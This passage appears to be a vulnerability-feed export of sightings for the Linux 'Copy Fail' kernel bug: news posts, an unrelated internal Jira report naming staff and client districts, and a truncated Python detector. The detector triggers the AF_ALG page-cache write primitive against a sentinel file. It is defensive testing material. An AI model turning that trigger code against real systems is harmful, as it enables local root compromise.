"https://bsky.app/profile/lascapi.social.tchncs.de.ap.brid.gy/post/3ml6wld6itgv2", "content": "Copy Fail CVE-2026-31431\n\n> How they found it\n> Taeyang Lee's earlier kernelCTF work had mapped out the AF_ALG attack surface. He realized that AF_ALG + splice creates a path where unprivileged userspace can feed page cache pages directly into the crypto subsystem and suspected that scatterlist [\u2026]", "creation_timestamp": "2026-05-06T14:39:51.127335Z"}, {"uuid": "cc3399bc-a40f-4d21-aae5-3f61f855e049", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/concisecyber.bsky.social/post/3ml6yfwt4jj2r", "content": "CISA Adds Actively Exploited Linux Root Access Bug CVE-2026-31431 to KEV\u00a0Catalog\n\nCISA has added CVE-2026-31431, a Linux local privilege escalation bug, to the KEV catalog after signs of active exploitation.", "creation_timestamp": "2026-05-06T15:12:33.443335Z"}, {"uuid": "3420ae3a-3e8e-4479-a929-5c461ac6e2dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/puntocomunica2.bsky.social/post/3ml6yhpdj322e", "content": "\ud83d\udea8 URGENTE: Vulnerabilidad del kernel \u00abCopy Fail\u00bb (CVE-2026-31431): Acci\u00f3n inmediata requerida indaga.net/urgente-vuln...", "creation_timestamp": "2026-05-06T15:13:35.009425Z"}, {"uuid": "6d204d84-d216-4694-bb6c-1b7eb2522478", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ef-edulog/196f93bbcfa280f66e78ec302180f773", "content": "\n\n\n\n\nJira Report \u2014 DO / IM / S2\n\n  :root {\n    --bg: #fff; --bg2: #f5f4ef; --bg3: #ebebeb;\n    --tx: #1a1a1a; --tx2: #666660; --tx3: #999994;\n    --info: #185FA5; --bdr: rgba(0,0,0,0.12); --bdr2: rgba(0,0,0,0.22);\n    --r: 8px; --rl: 12px;\n    --font: -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;\n    --mono: 'SF Mono','Fira Code',monospace;\n  }\n  @media(prefers-color-scheme:dark){\n    :root{--bg:#1e1e1c;--bg2:#2a2a28;--bg3:#333330;--tx:#f0efe8;--tx2:#a8a79f;--tx3:#6e6e68;--info:#85B7EB;--bdr:rgba(255,255,255,0.1);--bdr2:rgba(255,255,255,0.18)}\n  }\n  *{box-sizing:border-box;margin:0;padding:0}\n  body{font-family:var(--font);background:var(--bg);color:var(--tx);padding:24px;max-width:1300px;margin:0 auto}\n  h1{font-size:18px;font-weight:500;margin-bottom:4px}\n  .sub{font-size:12px;color:var(--tx2);margin-bottom:20px}\n  .tabs{display:flex;gap:6px;margin-bottom:1.25rem;flex-wrap:wrap}\n  .tab{padding:5px 13px;border:0.5px solid var(--bdr2);border-radius:var(--r);font-size:13px;cursor:pointer;background:var(--bg);color:var(--tx2)}\n  .tab.active{background:var(--bg2);color:var(--tx);font-weight:500}\n  .tab:hover:not(.active){background:var(--bg2)}\n  .legend{display:flex;gap:14px;flex-wrap:wrap;margin-bottom:1rem;font-size:11px;color:var(--tx2);align-items:center}\n  .li{display:flex;align-items:center;gap:4px}\n  .ld{width:9px;height:9px;border-radius:2px}\n  .summary-grid{display:grid;grid-template-columns:repeat(3,minmax(0,1fr));gap:8px;margin-bottom:1.25rem}\n  .metric{background:var(--bg2);border-radius:var(--r);padding:10px 12px}\n  .ml{font-size:11px;color:var(--tx2);margin-bottom:3px}\n  .mv{font-size:20px;font-weight:500}\n  .project-block{margin-bottom:1.1rem;border:0.5px solid var(--bdr);border-radius:var(--rl);overflow:hidden}\n  .ph{padding:9px 14px;border-bottom:0.5px solid var(--bdr);display:flex;align-items:center;justify-content:space-between}\n  .pn{font-size:13px;font-weight:500}\n  .pm{font-size:11px;color:var(--tx2)}\n  .th{padding:5px 14px;font-size:11px;font-weight:500;color:var(--tx2);background:var(--bg2);display:flex;align-items:center;gap:6px;border-top:0.5px solid var(--bdr)}\n  .tc{background:var(--bg3);color:var(--tx2);padding:1px 6px;border-radius:var(--r);font-size:10px}\n  .cols{display:grid;grid-template-columns:80px 1fr 86px 82px 82px 80px 98px;gap:4px;padding:4px 14px;font-size:10px;color:var(--tx3);background:var(--bg2);border-top:0.5px solid var(--bdr)}\n  .ir{display:grid;grid-template-columns:80px 1fr 86px 82px 82px 80px 98px;gap:4px;padding:6px 14px;align-items:start;border-top:0.5px solid var(--bdr);font-size:11px}\n  .ir.stale{background:rgba(250,238,218,0.3)}\n  .ir.highest{background:rgba(252,235,235,0.35)}\n  .ir.overdue{background:rgba(252,235,235,0.45)}\n  .ir.stale.highest,.ir.stale.overdue{background:rgba(250,220,200,0.45)}\n  @media(prefers-color-scheme:dark){\n    .ir.stale{background:rgba(99,56,6,0.2)}.ir.highest{background:rgba(121,31,31,0.2)}\n    .ir.overdue{background:rgba(121,31,31,0.3)}.ir.stale.highest,.ir.stale.overdue{background:rgba(110,40,6,0.28)}\n  }\n  .ik{color:var(--info);font-size:10px;font-family:var(--mono);white-space:nowrap;text-decoration:none}\n  .ik:hover{text-decoration:underline}\n  .is{color:var(--tx);line-height:1.4;overflow:hidden;display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical}\n  .ia{color:var(--tx2);font-size:10px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}\n  .dt{font-size:10px;white-space:nowrap}\n  .upd-ok{color:var(--tx2)}.upd-stale{color:#BA7517;font-weight:500}\n  .due-ok{color:var(--tx2)}.due-over{color:#A32D2D;font-weight:500}\n  .cr{color:var(--tx2)}\n  @media(prefers-color-scheme:dark){.upd-stale{color:#FAC775}.due-over{color:#F7C1C1}}\n  .dot-h{display:inline-block;width:5px;height:5px;border-radius:50%;background:#E24B4A;margin-right:2px;vertical-align:middle}\n  .dot-s{display:inline-block;width:5px;height:5px;border-radius:50%;background:#EF9F27;margin-right:2px;vertical-align:middle}\n  .dot-d{display:inline-block;width:5px;height:5px;border-radius:50%;background:#D85A30;margin-right:2px;vertical-align:middle}\n  .sb{font-size:10px;padding:2px 6px;border-radius:var(--r);text-align:center;white-space:nowrap}\n  .s-ip{background:#FAEEDA;color:#854F0B}.s-td{background:#E1F5EE;color:#0F6E56}\n  .s-oi{background:#FCEBEB;color:#A32D2D}.s-xx{background:var(--bg2);color:var(--tx2)}\n  @media(prefers-color-scheme:dark){\n    .s-ip{background:#633806;color:#FAC775}.s-td{background:#085041;color:#9FE1CB}.s-oi{background:#791F1F;color:#F7C1C1}\n  }\n  .empty{padding:16px;text-align:center;color:var(--tx3);font-size:12px}\n  .footer{font-size:11px;color:var(--tx3);margin-top:24px}\n\n\n\n\nJira Active Issues Report \u2014 DO / IM / S2\n\nGenerated May 06, 2026 at 03:26 PM  \u00b7  Excludes Done, Fixed, Canceled, Deferred  \u00b7  https://karrostech.atlassian.net\n\nLast 24 hrs24\u201348 hrs ago2\u20137 days agoOlder than 7 days\n\n\n  Highest priority\n  Stale \u22655 business days\n  Due date missed\n\n\n\n\n\nDO \u2014 Edulog DevOps\n1\n\nIM \u2014 Incident Management\n4\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                1 active issue\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nTask 1\n                    \n\n                      DO-2042\n                      Client Cancelation for Kuna Joint School District, ID - May 29 shutdown\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      On hold\n                    \n            \n\n              \n\n                IM \u2014 Incident Management\n                4 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 3\n                    \n\n                      IM-7574\n                      Gwinnett, GA - Missing Data in Telematics\n                      Josiah Brown\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7573\n                      Brunswick County, NC - APP Issues\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7571\n                      Cleveland, OH - Client Reported Delays in Both Telematics and with Parent Portal Messages this Morning\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \nTask 1\n                    \n\n                      IM-7572\n                      Framingham Public Schools, GPS units not reporting in since 11:30 AM today\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n\n\n\nDO \u2014 Edulog DevOps\n2\n\nIM \u2014 Incident Management\n1\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                2 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nTask 2\n                    \n\n                      DO-2041\n                      Remove the test server - fr-routing-legacy-test  it is no longer needed.\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2040\n                      Remove queuedNotification lambda function when associated NotificationService changes are deployed\n                      \u2014\n                      May 4, '26\n                      May 4, '26\n                      \u2014\n                      Backlog\n                    \n            \n\n              \n\n                IM \u2014 Incident Management\n                1 active issue\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 1\n                    \n\n                      IM-7569\n                      Zonar - Delay / Omission of pings to SM, PP\n                      Nick Sundberg\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n\n\n\nDO \u2014 Edulog DevOps\n10\n\nIM \u2014 Incident Management\n14\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                10 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nBug 2\n                    \n\n                      DO-2034\n                      DP V2 (build 180/AV1): EDP gateway /v4.0/vehicles/search returns 0 vehicles for development-test-school tenant\n                      \u2014\n                      May 3, '26\n                      May 3, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2033\n                      DP V2 (build 180/AV1): POST /apilive/setting/event/add returns 500 after login (tenantId='', deviceId=0)\n                      \u2014\n                      May 3, '26\n                      May 3, '26\n                      \u2014\n                      Backlog\n                    \nStory 1\n                    \n\n                      DO-2025\n                      Birdville, TX - Please deploy Telematics\n                      Cory Emlen\n                      Apr 29, '26\n                      May 6, '26\n                      \u2014\n                      IN PROGRESS\n                    \nTask 7\n                    \n\n                      DO-2037\n                      Deploy Hafeez's Data Build Tool\n                      Boluwatife Olaifa\n                      May 4, '26\n                      May 6, '26\n                      May 4, '26\n                      Backlog\n                    \n                    \n\n                      DO-2032\n                      Need script run on Cobb to remove duplicate locations\n                      Vader\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-2028\n                      All legacy PP ingestions have not run:\n                      Josiah Brown\n                      May 1, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2027\n                      Patch infra with CopyFail (CVE-2026-31431)\n                      Josiah Brown\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2026\n                      Johnston NC Demo Site down\n                      Vader\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Verification\n                    \n                    \n\n                      DO-2024\n                      Review all deployments, evaluate setting limits\n                      Josiah Brown\n                      Apr 29, '26\n                      Apr 29, '26 (5d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2023\n                      Testing Release Servers\n                      \u2014\n                      Apr 29, '26\n                      Apr 30, '26\n                      \u2014\n                      Backlog\n                    \n            \n\n              \n\n                IM \u2014 Incident Management\n                14 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 14\n                    \n\n                      IM-7567\n                      Fayette County, no bus event update since 4/29\n                      \u2014\n                      May 1, '26\n                      May 6, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7564\n                      Knox, TN - Gps units not reporting in since yesterday\n                      \u2014\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7563\n                       West Shore - Parent Portal not working\n                      Brandon Donnelson\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7561\n                      Denton, TX - Parent Portal App is not tracking buses\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7560\n                      Suffolk, call from parent experiencing tracking issues.\n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7559\n                      New Kent, parent portal not tracking\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7557\n                      New Hanover, Parent portal  tracking issues\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7556\n                      Jefferson, parent portal not tracking \n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7555\n                      Elyria-OH ,Parent Portal App don't track the bus.\n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7554\n                      Peoria, AZ - Parent Portal Down\n                      Brandon Donnelson\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7553\n                      Stanfield, AZ's Parent Portal is not working as of this morning.  Last reading 4:16am.  \n                      \u2014\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Blocker\n                    \n                    \n\n                      IM-7551\n                      SM Can't Send Messages to PP/PPL\n                      Boluwatife Olaifa\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7550\n                      Cleveland, OH - Not able to track buses - GPS tracking down\n                      Kehinde Metibemu\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7548\n                      Cobb County, GA - Severely Degraded Athena Performance\n                      Brandon Donnelson\n                      Apr 29, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n\n\n\nDO \u2014 Edulog DevOps\n50\n\nIM \u2014 Incident Management\n0\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                50 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nATH New site request 1\n                    \n\n                      DO-1787\n                      Elyria, OH - Athena Conversion from Legacy\n                      Cory Emlen\n                      Mar 17, '26\n                      Apr 30, '26\n                      Apr 17, '26\n                      Blocked\n                    \nBug 49\n                    \n\n                      DO-1905\n                      Parent Portal missing route/vehicle data after EKS 1.34 upgrade \u2014 missed cron sync + Hibernate 6 bug\n                      \u2014\n                      Apr 6, '26\n                      Apr 6, '26 (22d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1855\n                      There is no data available in Route assignment, Live substitution modules of Telematcis for Johnston site\n                      Mide Dickson\n                      Mar 26, '26\n                      Mar 26, '26 (29d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1854\n                      There is no data available in multiple pages like Students, Runs, Routes modules of Routing for Johnston site \n                      Mide Dickson\n                      Mar 26, '26\n                      Mar 26, '26 (29d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1842\n                      EDTA service missing MongoDB JVM args \u2014 broken on 57 production tenants\n                      \u2014\n                      Mar 25, '26\n                      Mar 25, '26 (30d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1801\n                      release-2-fr - Elastic search error displays into log - Unable to search for stop locations\n                      \u2014\n                      Mar 19, '26\n                      Mar 19, '26 (34d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1786\n                      [EastAllen, IN 1.78 Smoke]CA Result CSV \u2013 Export fails for valid dates with 400 Bad Request (invalid page number)\n                      Dane Elwood\n                      Mar 17, '26\n                      Mar 26, '26 (29d)\n                      \u2014\n                      Blocked\n                    \n                    \n\n                      DO-1785\n                      [EastAllen, IN 1.78 Smoke]Vehicles \u2013 Seating Configuration popup shows error \u201cnetwork issues\u201d due to backend API failure\n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1784\n                      [Lake Superior 1.78 Smoke]Time & Attendance module not opening from main dashboard\n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1783\n                      Config API is failing for Time & Attendance module in Collinsville site \n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1782\n                      Several API calls are failed in ultilities --> Employee Import and Queue Priority modules \n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1779\n                      [Cleveland -1.78] [Time & attendance][Absence Record] Data preview is not available\n                      Josiah Brown\n                      Mar 16, '26\n                      Mar 16, '26 (37d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1776\n                      Routes API CORS Blocked & Gateway Timeout on Routes Management Page\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 15, '26 (38d)\n                      \u2014\n                      Verification\n                    \n                    \n\n                      DO-1775\n                      [Chicago-1.78] [Telematics --> Edulog standard reports] - Unable to select date range for AM on time report\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 13, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1768\n                      [moorhead 1.78.0] [Telematics] [Vehicle Plan Error] Front end error for Vehicle on Route Historical view\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 16, '26 (37d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1767\n                      500 Internal Server Error on Athena Routing Screen \u2013 eligibilities API\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 23, '26 (32d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1766\n                      [Helena] API call fails on clicking \"Add New\" Student \n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 23, '26 (32d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1765\n                      Deleting a student without entering any data in Add student form is giving 405 error \n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 27, '26 (28d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1761\n                       is displayed against a checkbox on Custom transportation Needs \n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1760\n                      Pick A Location - External address return as the SA\" is failing because the \"Pick A Location\" button cannot be located on the page, preventing test execution.\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1759\n                      [Chief Leschi-1.78][Reports] [User defined Reports] Unable to create a new report template\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 31, '26 (26d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1758\n                      API returns 500 error when sending IN filter with empty values array in search request\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1757\n                      Stops/Checkpoints \u2013 Map not displayed in \u201cPick A Location\u201d popup when using Relocate\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1756\n                      [Chief Leschi-1.78] Created date is not same when downloaded a report\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 24, '26 (31d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1755\n                      Data Management \u2013 Map fails to load across multiple modules\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1754\n                      [Chief Leschi-1.78] Created by \"unknown\" appearing with CA Reports\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 24, '26 (31d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1753\n                      Students \u2013 Student picture API returning 404 Not Found when opening student record\n                      Josiah Brown\n                      Mar 12, '26\n                      Apr 6, '26 (22d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1752\n                      Students \u2013 Address parsing APIs (type, prefix, suffix) returning 500 Internal Server Error in background requests\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1751\n                      Students \u2013 Opening student record triggers \"Error parsing address\" popup and address standardization API returns 500\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1749\n                      Historical changes API is returning 500 Internal server error on Vehicle on routes in Telamatics\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1615\n                      Payroll Data is not available/displaying\n                      \u2014\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1614\n                      Data is not Visible for Default Working Hours in Employees under Data Management\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1613\n                      UDF Tab is not Displayed in Employee Information Page\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1611\n                      RPO \u2013 OPT actions failure\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1610\n                      [Chief Leschi-1.78] Created by \"unknown\" appearing with Stops details\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1608\n                      Location search fails with 504 Gateway Timeout when adding a new Stop\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1606\n                      Student Needs dialogs shows formatting issues and invalid \u201c504\u201d need option\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1594\n                      [Foundations] 404 error on Students detail page\n                      Josiah Brown\n                      Mar 10, '26\n                      Mar 10, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1591\n                      Web Query not configured for aldine-tx\n                      Josiah Brown\n                      Mar 10, '26\n                      Mar 10, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1579\n                      [Support][1.78] [Telematics] -- Error on FE Live Subs\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 9, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1578\n                      [Support-Site-1.78] 500 internal server error for \"eligibilities\"call\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 10, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1577\n                      [Training][1.78] [Telematics-Drivers] -- Error on FE for Route Assignment\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 30, '26 (27d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1575\n                      [Manitouspring][1.78] [Telematics-Drivers] -- Error on FE for Route Assignment\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 9, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1572\n                      [Manitouspring][1.78] Audit Logs: Unknown has been shown for many logs in users column\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 17, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1570\n                      500 err on cancel report API\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (43d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1569\n                      API Timesout - Endless Spinning Wheel Issue\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (43d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1562\n                      API times out/ when searching with keywords for location in Pick a Location Popup [smoke/hemet]\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (43d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1558\n                      [Houston-1.780] [Mapping] Console Error\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (44d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1556\n                      Home Page - Telematics module not displayed on Home Page\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (44d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1555\n                      [Houston-1.780] 500 internal server error for \"search\"call inside stop module\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (44d)\n                      \u2014\n                      To Do\n                    \n\nData sourced live from Jira on May 06, 2026 at 03:26 PM.\n\nfunction showTab(key,el){\n  document.querySelectorAll('.tab').forEach(t=>t.classList.remove('active'));\n  el.classList.add('active');\n  document.querySelectorAll('.pane').forEach(p=>p.style.display='none');\n  document.getElementById('pane-'+key).style.display='block';\n}\n\n\n", "creation_timestamp": "2026-05-06T15:26:34.000000Z"}, {"uuid": "2f7e14b3-c894-4eb5-8587-7b005929b161", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/Deemasta/663a32c808164adcacfa7e0877e5198e", "content": "#!/usr/bin/env python3\n# CVE-2026-31431 (\"Copy Fail\") vulnerability detector.\n#\n# Attempts to trigger the algif_aead / authencesn page-cache scratch-write\n# primitive against a user-owned sentinel file in a temp directory. If the\n# scratch write lands inside the spliced page-cache page, the file's contents\n# (as observed via a fresh read) will contain the marker bytes.\n#\n# SAFE BY DESIGN\n#   * Operates on a sentinel file the running user just created. /usr/bin/su\n#     and other system binaries are NOT touched.\n#   * Page-cache corruption is in-memory only; nothing is written back to disk.\n#   * Exit 0 = NOT vulnerable, 2 = VULNERABLE, 1 = test error.\n#\n# Use only on hosts you own or are explicitly authorized to test.\n\nimport errno\nimport os\nimport socket\nimport struct\nimport sys\nimport tempfile\n\nAF_ALG                    = 38\nSOL_ALG                   = 279\nALG_SET_KEY               = 1\nALG_SET_IV                = 2\nALG_SET_OP                = 3\nALG_SET_AEAD_ASSOCLEN     = 4\nALG_OP_DECRYPT            = 0\nCRYPTO_AUTHENC_KEYA_PARAM = 1   # rtattr type from \n\nALG_NAME = \"authencesn(hmac(sha256),cbc(aes))\"\nPAGE     = 4096\nASSOCLEN = 8     # SPI(4) || seqno_lo(4)\nCRYPTLEN = 16    # one AES block\nTAGLEN   = 16    # truncated HMAC-SHA256\nMARKER   = b\"PWND\"\n\n\ndef build_authenc_keyblob(authkey: bytes, enckey: bytes) -> bytes:\n    # struct rtattr { u16 rta_len; u16 rta_type } || __be32 enckeylen || keys\n    rtattr   = struct.pack(\"HH\", 8, CRYPTO_AUTHENC_KEYA_PARAM)\n    keyparam = struct.pack(\">I\", len(enckey))\n    return rtattr + keyparam + authkey + enckey\n\n\ndef precheck() -> str | None:\n    if not os.path.exists(\"/proc/crypto\"):\n        return \"/proc/crypto missing\"\n    try:\n        socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0).close()\n    except OSError as e:\n        return f\"AF_ALG socket family unavailable ({e.strerror})\"\n    try:\n        s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)\n        s.bind((\"aead\", ALG_NAME))\n        s.close()\n    except OSError as e:\n        return f\"{ALG_NAME!r} cannot be instantiated ({e.strerror})\"\n    return None\n\n\ndef attempt_trigger(target_path: str) -> tuple[bool, bytes]:\n    sentinel = (b\"COPYFAIL-SENTINEL-UNCORRUPTED!!\\n\" * (PAGE // 32))[:PAGE]\n    with open(target_path, \"wb\") as f:\n        f.write(sentinel)\n\n    # Populate page cache.\n    fd_target = os.open(target_path, os.O_RDONLY)\n    os.read(fd_target, PAGE)\n    os.lseek(fd_target, 0, os.SEEK_SET)\n\n    # Master socket: bind + key.\n    master = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)\n    master.bind((\"aead\", ALG_NAME))\n    master.setsockopt(\n        SOL_ALG, ALG_SET_KEY,\n        build_authenc_keyblob(b\"\\x00\" * 32, b\"\\x00\" * 16),\n    )\n    op, _ = master.accept()\n\n    # Per-op parameters travel as control messages on sendmsg, not setsockopt.\n    # AAD bytes 4..7 are seqno_lo - the value the buggy scratch-write copies\n    # into dst[assoclen + cryptlen]. We pick MARKER so corruption is obvious.\n    aad = b\"\\x00\" * 4 + MARKER\n    cmsg = [\n        (SOL_ALG, ALG_SET_OP,            struct.pack(\"I\", ALG_OP_DECRYPT)),\n        (SOL_ALG, ALG_SET_IV,            struct.pack(\"I\", 16) + 